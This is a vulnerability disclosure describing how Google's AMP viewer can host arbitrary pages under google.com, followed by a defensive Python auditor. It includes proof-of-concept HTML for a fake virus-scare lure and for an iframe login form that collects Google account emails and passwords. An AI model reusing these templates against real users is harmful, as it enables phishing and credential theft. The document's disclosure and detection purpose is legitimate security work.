Overview
It is possible to use a flaw in Google.com to host malicious content. However, such content is not able to interact with anything on the Google.com domain itself.
Details
Google’s main website provides a subsite for displaying mobile-optimized pages published using a special subset of HTML called AMP. The current implementation can display any AMP page on the Internet without checking its content. The URL format is as follows:
where XXXX is the URL of the site. This ONLY works on mobile devices and can be simulated using Chrome’s developer tools; on desktop browsers, it will redirect to the page itself (as described in our earlier post). Here is a real working example:

This, however, can be used to display malicious content. Due to the way AMP is designed, AMP pages are not allowed to have JavaScript or “javascript:” URLs. They can, however, have URLs that lead to the Google Play store or iTunes. This can be leveraged to fool users into installing apps they don’t need — all on Google.com. Here is an example screenshot — note the URL and that a valid Google.com certificate is used. The link goes to the Google Play store.

Source code - BODY tag only, the rest is standard AMP HTML (see here):
<body>
  <amp-img src="glogo.jpg" alt="logo" height="200px" width="300px"></amp-img>
  <h3>We have scanned your phone and found it to be infected with a virus. To clean your phone, please click on the link below</h3>
  <p><a href="https://play.google.com/store/apps/details?id=com.cleanmaster.mguard&hl=en">Clean My Phone</a></p>
</body>
Taking this a step further, while AMP does not allow forms and JavaScript in the main page, it does allow JavaScript and forms in an iframe, as long as that iframe is at least 75% down from the top of the page. This can be used to do the following — embedding a malicious login form inside an iframe, which can then be used to steal people’s Google account credentials. Example screenshot and source below — this is not styled since it is a PoC.


Main page BODY:
<body>
  <amp-img src="glogo.jpg" alt="logo" height="300px" width="300px"></amp-img>
  <amp-img src="glogo.jpg" alt="logo" height="300px" width="300px"></amp-img>
  <h3>You have logged out of your account, please login again below</h3>
  <amp-iframe width="300px" height="300px" sandbox="allow-scripts allow-forms" layout="responsive" frameborder="0" src="iframe.html"></amp-iframe>
</body>
Iframe Source:
<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Test1</title>
  </head>
  <body>
    <form action="form.py">
      Email: <input type="text" name="email"/><br/>
      Password: <input type="password" name="password"/><br/>
      <input type="submit"/>
    </form>
  </body>
</html>
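The pattern above (a form-enabled amp-iframe framing a document that asks for a password) is something a defender can look for when reviewing AMP content served from a trusted domain. The following auditor is an added example, not code from the advisory; the sample documents are constructed to mirror the proof of concept above, and the element and attribute names come from the AMP markup shown on this page.

```python
from html.parser import HTMLParser

# Sandbox flags that let framed content run script or submit forms.
RISKY_SANDBOX = {"allow-scripts", "allow-forms", "allow-same-origin"}

class AmpAuditor(HTMLParser):
    # Records amp-iframe sandbox flags, form targets and password inputs seen in a document.
    def __init__(self):
        super().__init__()
        self.iframes, self.form_actions, self.password_fields = [], [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "amp-iframe":
            sandbox = set((a.get("sandbox") or "").split())
            self.iframes.append({"src": a.get("src", ""),
                                 "risky": sorted(sandbox & RISKY_SANDBOX)})
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1

def audit(html):
    # Parse one HTML document and return what the auditor collected.
    p = AmpAuditor()
    p.feed(html)
    return {"iframes": p.iframes, "form_actions": p.form_actions,
            "password_fields": p.password_fields}

def frames_credential_form(amp_html, framed_html):
    # True when the AMP page embeds a form-enabled amp-iframe and the framed
    # document asks for a password: the combination the advisory describes.
    outer, inner = audit(amp_html), audit(framed_html)
    form_enabled = any("allow-forms" in f["risky"] for f in outer["iframes"])
    return form_enabled and inner["password_fields"] > 0

# Constructed samples modelled on the advisory's proof of concept (not the original files).
SAMPLE_AMP = ('<body><h3>You have logged out, please login again below</h3>'
              '<amp-iframe width="300px" height="300px" sandbox="allow-scripts allow-forms"'
              ' layout="responsive" frameborder="0" src="iframe.html"></amp-iframe></body>')
SAMPLE_FRAME = ('<form action="form.py">Email: <input type="text" name="email"/>'
                'Password: <input type="password" name="password"/><input type="submit"/></form>')
# A benign amp-iframe (for example an embedded map) with no sandbox permissions requested.
BENIGN_AMP = '<body><amp-iframe src="map.html" layout="responsive"></amp-iframe></body>'

if __name__ == "__main__":
    print(audit(SAMPLE_AMP)["iframes"])  # [{'src': 'iframe.html', 'risky': ['allow-forms', 'allow-scripts']}]
    print(frames_credential_form(SAMPLE_AMP, SAMPLE_FRAME))  # True
    print(frames_credential_form(BENIGN_AMP, SAMPLE_FRAME))  # False
```

The check only inspects markup that has already been fetched; pairing it with the AMP validator and a review of where each amp-iframe src actually points gives a fuller picture.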
Vendor Response
The vendor has communicated that they do not consider this to be a security issue.
References
- Google Security CID: 8-1639000011264
- AMP site: https://www.ampproject.org/
Credits
Researched and written by Yakov Shafranovich.
Timeline
2016-04-12: Vendor notified
2016-04-13: Vendor response
2016-04-13: Public disclosure